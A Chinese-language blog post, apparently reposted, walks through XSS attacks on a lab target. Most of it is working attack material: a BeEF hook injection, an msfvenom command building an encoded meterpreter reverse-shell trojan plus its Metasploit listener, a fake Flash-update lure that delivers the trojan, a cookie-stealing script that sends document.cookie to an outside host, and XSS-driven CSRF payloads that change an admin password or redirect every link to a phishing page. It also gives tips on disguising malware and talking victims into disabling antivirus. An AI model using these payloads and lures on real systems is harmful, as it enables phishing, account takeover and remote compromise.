玩转xss

玩转xss0x00前言很多人现在都没懂xss为什么这么鸡肋的漏洞能排到owasp前十名,xss做多也就拿来做个弹窗和打cookie,然后进入后台,感觉没啥意义,还不如弱口令来得实在。那么我们就先

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

玩转xss

0x00 前言

很多人现在都没懂xss为什么这么鸡肋的漏洞能排到owasp前十名,xss做多也就拿来做个弹窗和打cookie,然后进入后台,感觉没啥意义,还不如弱口令来得实在。那么我们就先来看看xss的作用和用途。

0x01 关于xss的奇思妙想

但是xss如果真的去了解他的话,能玩出不少花样,就例如前段时间面试某大厂问到的,xss能干嘛?这点是比较关键的一个点。如果是按照挖洞来说xss能打cookie 、能弹窗就行,这样的对应网站或者是厂商来说影响不是很大。而且要是存储下的xss才可以。这样的情况最多只能进管理后台,然后还要通过文件上传的方式才能拿shell。

那么对于做一些违法网站的人来说呢,这个xss可以做到url劫持,或者是弹出广告等等。

那么如果我们再往深了说呢?

xss能页面钓鱼、内网探测、配合csrf打组合拳、截取摄像头、键盘记录、扫描内网端口信息、获取粘贴版内容、xss蠕虫等等操作。xss的一些蠕虫攻击也会配合到ajax。

还有一个值得我们思考的问题是危害最严重的一定是存储性xss吗?

这个问题是一直都有争议的。

那么我们先来聊聊存储型xss

1.存储型xss:这个无容置疑是最简单利用的,也是最有效的,能直接看到成果。比如可以配合beef使用,具体能干嘛这里就不做多的赘述,前面都有提到过,其他类型能做到的存储型的基本都能实现。一些apt组织也经常会利用到xss进行水坑攻击。

2.反射性xss :反射性xss只能够自己提交,然后直接返回给我们前端,这样的话我们只能通过社工的方式发送给管理员来使得对方提交。

设想一下如果我们构建的不是弹窗和获取发送cookie的代码呢?

假设他的payload使一段和beef类似的,插入的代码是让js代码去请求hook.js,而js代码里面是爬取此网站的超链接,然后获取<input>标签,然后再value值里面再插入我们paylaod的内容,这样就形成的一个蠕虫攻击,但是这里要涉及的一点是跨域的问题,这里同源策略会阻止我们的js代码发起跨域请求。这时候就可以配合我们的cors跨域和jsonp跨域劫持了。

我们还可以写一个循环然后获取他所有的a标签,然后进行所有的a标签都替换成我们的csrf的链接。

3.dom型xss:这个xss发生的位置是在url里面产生的,我们可以直接在url里面插入xss paylaod ,编码后的url,然后再进行转换短链接。这时候就可以以社工的方式发送给管理员,进行cookie的盗取。如果对方开启httponly的话那就获取不到对方cookie,我们就需要用到其他的手段,例如钓鱼 先用xss跳转到一个cs克隆的某网站上面,然后页面再采用跳转,跳转到exe木马的路径,进行木马的下载。当然木马的伪装要好,例如前段时间比较流行的falsh钓鱼,免杀也是个问题,如果不会,也可以采用社工的手段诱使对方下载,例如金瓶xx续集,软件会报毒请关闭杀软,软件无毒,绿色版本等等手段。

 

0x02 xss实现

存储下xss:

至于怎么使用xss平台打cookie和弹窗的这里就不做赘述了。我们直接使用beef来实现。

来到kali终端

cd /usr/share/beef-xss/
./beef

 

启动beef

玩转xss

 

 

这里看到127.0.0.1/ui/panel 的路径是beef的控制面板,我们需要从浏览器打开,然后在浏览器进行操控。

127.0.0.1/hook.js的这个地址是我们需要用xss插入的地址。

直接来到靶场,插入beef的payload。

<script src="http://192.168.31.111:3000/hook.js"></script>

 

插入到一个存在存储型xss的地方,就可以直接打开浏览器,来到控制面板就看到有主机上线了。

玩转xss

 

 

beef的功能很强大,可以直接上线时候探测系统版本,浏览器类型,主机ip。

玩转xss

 

 

点击主机,然后再点击 Current Browser可以看到上线主机的系统版本、类型 、内网ip 以及cookie信息。

使用flash进行钓鱼攻击:

玩转xss

 

 

选择Social Engineering的 Fake Flash Update 伪装flash更新模块。

image的位置我找了个网络图片来进行显示,在实战当中可以做得更逼真。

Custom Payload URI:这里填入需要跳转的地址,这里就可以填入木马的地址,当然为了更逼真可以先跳转到一个克隆的网页,然后再进行跳转到木马的地址,这里为了方便就直接填入木马的地址。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=4444 -e x86/shikata_ga_nai -i 10 -a x86 --platform windows -f exe> 1.exe

 

msf生成木马 ,在生成木马的时候可以-x参数指定一个flash.exe的模板。

cp 1.exe /var/www/html  
systemctl start apache2 

 

启动web服务,然后beef的Custom Payload URI:选项填入木马的web地址。

msf启动监听

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.31.111
lhost => 192.168.31.111
msf5 exploit(multi/handler) > run -j

 

 

 

玩转xss

 

 

点击执行。

 

来到浏览器这边

玩转xss

 

 

看到已经显示了我们设置的图片,

点击图片后会跳转到我们木马的地址直接进行文件下载

玩转xss

 

 

点击保存运行,

 

玩转xss

 

 

成功上线。

 

反射性xss:

玩转xss

 

 

这里输入弹窗的语句成功的弹窗,并且payload语句显示在url上面,这是get的提交方式,我们可以直接来构造url语句然后发送给管理员钓鱼。

192.168.31.110/vul/xss/xss_reflected_get.php?message=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=submit

 

这里的payload要进行url编码,直接输入的话无法识别。

在物理机火狐浏览器访问这url时候能直接弹窗,在虚拟机的ie浏览器里面显示拦截了。

玩转xss

 

 

这是浏览器的csp,全称是内容安全策略。

内容安全策略 (CSP, Content Security Policy) 是一个附加的安全层,用于帮助检测和缓解某些类型的攻击,包括跨站脚本 (XSS) 和数据注入等攻击。 这些攻击可用于实现从数据窃取到网站破坏或作为恶意软件分发版本等用途。
尽管内容安全策略在 Firefox 4 中已经包含,使用 X-Content-Security-Policy 头部来实现,但它使用的是过时的 CSP 标准。Firefox 23 包含了更新的 CSP 实现,使用的是 W3C CSP 1.0 标准中描述的没有前缀的 Content-Security-Policy 头部和指令。
上面是百度复制过来的资料。

 

我们这时候还得和csp对抗。

至于怎么绕过csp可以参考先知论坛某大佬的文章。

https://xz.aliyun.com/t/5084

这里我们已经能弹窗,证明js代码能执行,我们可以配合csrf进行攻击。

我们先来使用get来试试。

玩转xss

 

 

抓取到一个get型csrf,然后构造语句。

csrf payload:

http://192.168.31.110/vul/csrf/csrfget/csrf_get_login.php?username=admin&password=123&submit=Login

 

使用xss插入csrf payload

192.168.31.110/vul/xss/xss_reflected_get.php?message=<script src="http://192.168.31.110/vul/csrf/csrfget/csrf_get_login.php?username=admin&password=123&submit=Login"></script>&submit=submit

 

构造完成了 我们还需要把payload拿去url编码一下。

http://192.168.31.110/vul/xss/xss_reflected_get.php?message=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%33%31%2e%31%31%30%2f%76%75%6c%2f%63%73%72%66%2f%63%73%72%66%67%65%74%2f%63%73%72%66%5f%67%65%74%5f%6c%6f%67%69%6e%2e%70%68%70%3f%75%73%65%72%6e%61%6d%65%3d%61%64%6d%69%6e%26%70%61%73%73%77%6f%72%64%3d%31%32%33%26%73%75%62%6d%69%74%3d%4c%6f%67%69%6e%22%3e%3c%2f%73%63%72%69%70%74%3e&submit=submit

 

这时候我们就可以发送给对方管理员,然后进行密码的修改。

既然能弹窗那就肯定能打cookie

 

192.168.31.110/vul/xss/xss_reflected_get.php?message=<script>document.location = 'http://192.168.1.15/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>&submit=submit

 

直接获取cookie传参给cookie,然后再cookie.php写一个get接收,写入文件,打cookie代码简单完成,成功获取到cookie信息。

 

那么如果我们是post型的csrf该怎么去打组合拳呢

 

我们可以直接获取到他的超链接然后进行替换,替换成我们伪造的页面,而页面的内容就是post型csrf的poc。

使用burp构造csrf poc ,复制html代码,然后写到html文件里面。

玩转xss

 

 

这里提交的内容已经做了隐藏,我们可以再写点钓鱼的东西让对方点击按钮,再修改按钮的值,例如点击中奖什么的。

这里思路有2种:

思路1:使用xss直接跳转到此钓鱼页面

思路2:替换所有a标签,超链接使对方点击任意超链接跳转。

 

思路一实现:

<script>document.location = 'http://192.168.31.111/1.html;  </script>

 

加载时候直接跳转到页面。

思路2实现:

<script type="text/javascript">
​
window.onload = function() { 
    var a=document.getElementsByTagName("a"); 
    for(i = 0; i < a.length; i++) {
        a[i].href="http://192.168.31.111/1.html";} }  
​
</script>

 

windows加载的时候获取所有的a标签,然后使用循环一一替换成192.168.31.111/1.html的页面。

构造语句:

192.168.31.110/vul/xss/xss_reflected_get.php?message=%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e%0a%0a%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%20%0a%09%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%20%0a%09%66%6f%72%28%69%20%3d%20%30%3b%20%69%20%3c%20%61%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%20%20%20%20%61%5b%69%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%33%31%2e%31%31%31%2f%31%2e%68%74%6d%6c%22%3b%7d%20%7d%20%20%0a%0a%3c%2f%73%63%72%69%70%74%3e&submit=submit

玩转xss

 

 

 

玩转xss

 

 

这里有个超链接,点击看看

直接跳转到我们的csrf页面。

0x03 结尾

xss还有很多玩法,而至于xss危害性这个问题,我个人觉得 xss漏洞的危害应该是按照危害的严重性来评判,而不是按照漏洞类型来评判。xss反射性也能玩出一番花样,当时在广州参加了hackingone峰会上,也提到了这一点。如果是存储型xss拿来弹框,仅仅只是打到后台登录的cookie危害级别比较低,前几天看xss深度刨析一本书的时候看到某网站xss反射性也能蠕虫攻击,我当时也被这骚操作给惊到了。如果说想深入了解xss可以去参考《XSS跨站脚剖析与防御》这本书。

 

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/119970.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • 向量内积/点积_两个向量的内积和外积

    向量内积/点积_两个向量的内积和外积向量内积/点积在向量空间Rn中,自然基下,向量x=(x1,…,xn)和y=(y1,…,yn)在向量空间\mathbb{R}^n中,自然基下,向量\boldsymbol{x}=(x_1,\ldots,x_n)和\boldsymbol{y}=(y_1,\ldots,y_n)在向量空间Rn中,自然基下,向量x=(x1​,…,xn​)和y=(y1​,…,yn​)的点积(dotproduct),或称内…

  • 想自己搭建服务器,永久运行网站?一个 U 盘大小的树莓派就够了!

    想自己搭建服务器,永久运行网站?一个 U 盘大小的树莓派就够了!

    2020年11月13日
  • Java中next()和nextLine()区别及用法「建议收藏」

    Java中next()和nextLine()区别及用法「建议收藏」今天在项目之余,到杭电上刷了一道题,那道题是1062题,程序本身不是难,但是在里面实现过程中,突然发现用的Scanner类进行输入的,用到了next和nextLine这两个方法,在输入过程中也遇到一些问题,接下来进行讲述自己遇到的问题,以及如何解决的杭电1062题目:TextReverseProblemDescriptionIgnatiuslike

  • 对数的计算公式[通俗易懂]

    对数的计算公式[通俗易懂]性质编辑①;②;③负数与零无对数.④*=1;恒等式及证明a^log(a)(N)=N(a>0,a≠1)推导:log(a)(a^N)=N恒等式证明在a>0且a≠1,N>0时设:当l

  • Linux下GCC编译器的安装「建议收藏」

    Linux下GCC编译器的安装「建议收藏」通过aptget方式下载的Qt5.9的gcc编译器版本只是4.8.3,无法打开一些Qt5的库头文件,所以准备在Llinux下再安装一个gcc5.3.0。查看gcc版本ubuntu下查看gcc的版

  • 信息系统项目的范围管理论文_高级项目管理师论文

    信息系统项目的范围管理论文_高级项目管理师论文本人参加了2019年上半年信息系统项目管理师考试,目前已经通过。论文我压了2篇,但是都没有压中,考场看到题目差点吐血,还好后面按照自己的思路也顺利过关。这里和大家分享一下我的论文资料,大家可以参考。摘要20xx年x月,我作为项目经理参与了深圳市某上市公司的生产管理系统项目。该项目总投资300万人民币,建设工期为10个月,通过项目的建设,实现了该公司物料管理、库存管理、生产工单、生产计划、生产派…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号